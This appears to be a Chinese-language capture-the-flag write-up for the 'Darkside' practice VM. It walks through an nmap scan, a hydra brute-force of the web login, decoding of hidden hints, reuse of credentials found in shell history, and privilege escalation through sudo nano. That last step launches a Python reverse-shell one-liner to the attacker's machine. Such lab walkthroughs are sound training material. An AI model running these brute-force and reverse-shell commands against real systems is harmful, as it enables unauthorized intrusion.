Darkside
备注
[Linux VM] [Tested on VirtualBox] created by || boyras200
⏲️ Release Date // 2023-10-30
✔️ MD5 // 6d89b7cfa480c017eb8fca600469b8a7
☠ Root // 100
💀 User // 98
📝Notes // Are you ready to enter the darkside?
靶机启动
靶机 IP
192.168.56.107
nmap 信息搜集
Nmap scan report for 192.168.56.107 (192.168.56.107)
Host is up (0.00055s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u2 (protocol 2.0)
| ssh-hostkey:
| 3072 e0:25:46:8e:b8:bb:ba:69:69:1b:a7:4d:28:34:04:dd (RSA)
| 256 60:12:04:69:5e:c4:a1:42:2d:2b:51:8a:57:fe:a8:8a (ECDSA)
|_ 256 84:bb:60:b7:79:5d:09:9c:dd:24:23:a3:f2:65:89:3f (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Debian))
|_http-title: The DarkSide
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.56 (Debian)
web 服务
尝试目录爆破,得到以下信息
[09:34:48] 301 - 317B - /backup -> http://192.168.56.107/backup/
[09:34:48] 200 - 937B - /backup/
[09:35:02] 200 - 683B - /index.php
[09:35:02] 200 - 683B - /index.php/login/
访问 /backup/,得到
http://192.168.56.107/backup/vote.txt
rijaba: Yes
xerosec: Yes
sml: No
cromiphi: No
gatogamer: No
chema: Yes
talleyrand: No
d3b0o: Yes
Since the result was a draw, we will let you enter the darkside, or at least temporarily, good luck kevin.
在其中,可以得到以下用户名
rijaba
xerosec
sml
cromiphi
gatogamer
chema
talleyrand
d3b0o
kevin
根据提示,针对 kevin 用户发起攻击
┌─[randark@parrot]─[~]
└──╼ $hydra -v -V -l kevin -P /usr/share/wordlists/rockyou.txt -I 192.168.56.107 http-post-form "/:user=kevin&pass=^PASS^:invalid"
......
[80][http-post-form] host: 192.168.56.107 login: kevin password: iloveyou
得到以下凭据
kevin:iloveyou
登录之后,得到这份信息
kgr6F1pR4VLAZoFnvRSX1t4GAEqbbph6yYs3ZJw1tXjxZyWCC
使用 Cyberchef 的 magic 模块尝试自动解码
得到
sfqekmgncutjhbypvxda.onion
尝试访问这个 Tor 链接,发现并不能访问,联想之前的链接,尝试访问 http://192.168.56.107/sfqekmgncutjhbypvxda.onion/
<!DOCTYPE html>
<html>
<head>
<title>Which Side Are You On?</title>
<style>
body {
background-color: black;
color: white;
font-size: 24px;
margin: 0;
}
</style>
</head>
<body>
<div>
<p>Which Side Are You On?</p>
</div>
<script>
var sideCookie = document.cookie.match(/(^|)side=([^;]+)/);
if (sideCookie && sideCookie[2] === 'darkside') {
window.location.href = 'hwvhysntovtanj.password';
}
</script>
</body>
</html>
分析网页源码,即可解析其中的 Javascript 逻辑
最后可以得到这份信息
http://192.168.56.107/sfqekmgncutjhbypvxda.onion/hwvhysntovtanj.password
kevin:ILoveCalisthenics
User - kevin
┌─[randark@parrot]─[~]
└──╼ $pwncat-cs kevin@192.168.56.107
[16:42:59] Welcome to pwncat 🐈!
Password: *****************
[16:43:02] 192.168.56.107:22: normalizing shell path
[16:43:03] 192.168.56.107:22: registered new host w/ db
(local) pwncat$ back
(remote) kevin@darkside:/home/kevin$ whoami
kevin
flag - user
(remote) kevin@darkside:/home/kevin$ cat user.txt
UnbelievableHumble
提权探测
find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/umount
/usr/bin/mount
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/su
/usr/bin/sudo
sudo -l
Sorry, user kevin may not run sudo on darkside.
getcap -r / 2>/dev/null
/usr/bin/ping cap_net_raw=ep
读取命令行历史
/home/kevin/.history
ls -al
hostname -I
echo "Congratulations on the OSCP Xerosec"
top
ps -faux
su rijaba
ILoveJabita
ls /home/rijaba
获得一个凭据
rijaba:ILoveJabita
User - rijaba
┌─[randark@parrot]─[~]
└──╼ $pwncat-cs rijaba@192.168.56.107
[17:02:02] Welcome to pwncat 🐈!
Password: ***********
[17:02:05] 192.168.56.107:22: normalizing shell path
[17:02:06] 192.168.56.107:22: registered new host w/ db
(local) pwncat$ back
(remote) rijaba@darkside:/home/rijaba$ whoami
rijaba
提权探测
sudo -l
Matching Defaults entries for rijaba on darkside:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User rijaba may run the following commands on darkside:
(root) NOPASSWD: /usr/bin/nano
尝试提权
(remote) rijaba@darkside:/home/rijaba$ sudo /usr/bin/nano
然后 Ctrl + T,执行指令
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.102",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'
成功收到回连的shell
User - root
┌─[randark@parrot]─[~]
└──╼ $pwncat-cs -lp 9999
[17:07:03] Welcome to pwncat 🐈!
[17:07:34] received connection from 192.168.56.107:33802
[17:07:34] 192.168.56.107:33802: registered new host w/ db
(local) pwncat$ back
(remote) root@darkside:/home/rijaba# whoami
root
flag - root
(remote) root@darkside:/root# cat root.txt
██████╗░░█████╗░██████╗░██╗░░██╗░██████╗██╗██████╗░███████╗
██╔══██╗██╔══██╗██╔══██╗██║░██╔╝██╔════╝██║██╔══██╗██╔════╝
██║░░██║███████║██████╔╝█████═╝░╚█████╗░██║██║░░██║█████╗░░
██║░░██║██╔══██║██╔══██╗██╔═██╗░░╚═══██╗██║██║░░██║██╔══╝░░
██████╔╝██║░░██║██║░░██║██║░╚██╗██████╔╝██║██████╔╝███████╗
╚═════╝░╚═╝░░╚═╝╚═╝░░╚═╝╚═╝░░╚═╝╚═════╝░╚═╝╚═════╝░╚══════╝
youcametothedarkside